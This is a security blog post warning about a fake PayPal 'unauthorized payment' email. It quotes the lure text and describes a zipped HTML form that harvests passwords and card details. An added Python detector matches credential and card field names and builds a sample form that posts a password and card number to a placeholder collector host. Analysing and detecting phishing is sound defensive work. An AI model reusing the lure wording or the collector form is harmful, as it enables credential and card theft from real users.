PayPal “Unauthorized Credit Card Payment” Phish

A fake PayPal email, addressed “Dear PayPal”, with an attachment to fill in? What could possibly go wrong?

Fake mail

The email reads as follows:

Dear PayPal user,

We recently received a report of unauthorized credit card payment attempt associated with this account. To protect you against any further unauthorised payment attempts, we’ve limited access to your PayPal account. Please take a minute to review the details below and what steps you need to take to remove the limits.

-----------------------------------
Details of disputed transaction
-----------------------------------
Case ID Number: PP-001-546-712-049

-----------------------------------
What to do next
-----------------------------------

Please download the form attached to this email and open it in a web browser. Once opened, you will be provided with steps to restore your account access. We appreciate your understanding as we work to ensure your account safety.

-----------------------------------
Due dates
-----------------------------------
Please get back to us as soon as possible.

-----------------------------------
Other details
-----------------------------------
There are no other details for this transaction at this time.

Yours sincerely, PayPal

Just like the spam from mid-February, this one comes with a zipped attachment:

Case ID Number PP-001-546-712-049

with a .html file inside called…well, you can probably guess what it’s called:

Case ID Number PP-001-546-712-049.html

html attachment

The form asks for:

Email address, full name, PayPal password, DOB, billing address / town, county, postcode, home phone, credit / debit card number, expiry date, security code and sort code.

Of course, you shouldn’t fill this in or hit the “Send” button – just delete the attachment and send the mail to the spam folder.
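If you filter mail for other people, the delivery pattern above (a zip holding an .html form that asks for a password and card details) can be flagged before anyone opens it. The Python below is an added example, not code from the original post: the field-name keywords, the `collector.example` URL and the sample form are constructed assumptions, since the post does not show the attachment's markup.

```python
import io
import re
import zipfile
from html.parser import HTMLParser

# Assumption: keywords approximating the fields the form asks for; real names vary.
SENSITIVE = re.compile(r"pass|card|cvv|security|expir|sort|dob|birth", re.I)
MAX_BYTES = 2_000_000  # skip oversized members rather than decompressing them

class FormAudit(HTMLParser):
    """Collects form actions and sensitive-looking input fields."""
    def __init__(self):
        super().__init__()
        self.actions, self.hits, self.has_password = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag in ("input", "select", "textarea"):
            self.has_password |= a.get("type", "").lower() == "password"
            label = a.get("name") or a.get("id", "")
            if SENSITIVE.search(label):
                self.hits.append(label)

def audit_zip(data: bytes) -> list:
    """Return one finding per .htm/.html member of a zipped attachment."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".htm", ".html")) or info.file_size > MAX_BYTES:
                continue
            p = FormAudit()
            p.feed(zf.read(info).decode("utf-8", errors="replace"))
            remote = [x for x in p.actions if x.lower().startswith(("http://", "https://", "//"))]
            findings.append({"file": info.filename, "password_field": p.has_password,
                             "sensitive_fields": p.hits, "remote_actions": remote,
                             "suspicious": bool(p.actions) and (p.has_password or len(p.hits) >= 2)})
    return findings

def build_sample() -> bytes:
    """Constructed sample zip (not the real attachment); collector.example is a placeholder."""
    html = ('<form action="https://collector.example/submit" method="post">'
            '<input name="email"><input type="password" name="paypal_pass">'
            '<input name="card_number"><input name="sort_code"><input type="submit"></form>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Case ID Number PP-001-546-712-049.html", html)
    return buf.getvalue()
```

Call `audit_zip()` on the raw bytes of each zipped attachment and quarantine any message with a finding marked `suspicious`; a local HTML file whose form posts to a remote address is worth a second look on its own.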

No doubt these scammers will be back with a fresh ploy in the near future but for now, this one will hopefully have a low success rate.

Christopher Boyd

ABOUT THE AUTHOR

Christopher Boyd

Former Director of Research at FaceTime Security Labs. He has a very particular set of skills. Skills that make him a nightmare for threats like you.